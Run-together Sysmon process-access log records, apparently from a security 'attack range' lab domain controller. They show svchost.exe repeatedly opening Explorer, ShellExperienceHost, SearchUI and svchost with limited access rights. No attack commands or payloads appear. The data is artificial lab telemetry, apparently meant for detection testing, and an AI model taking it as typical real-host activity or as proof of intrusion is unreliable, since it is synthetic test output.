11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:37.765{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 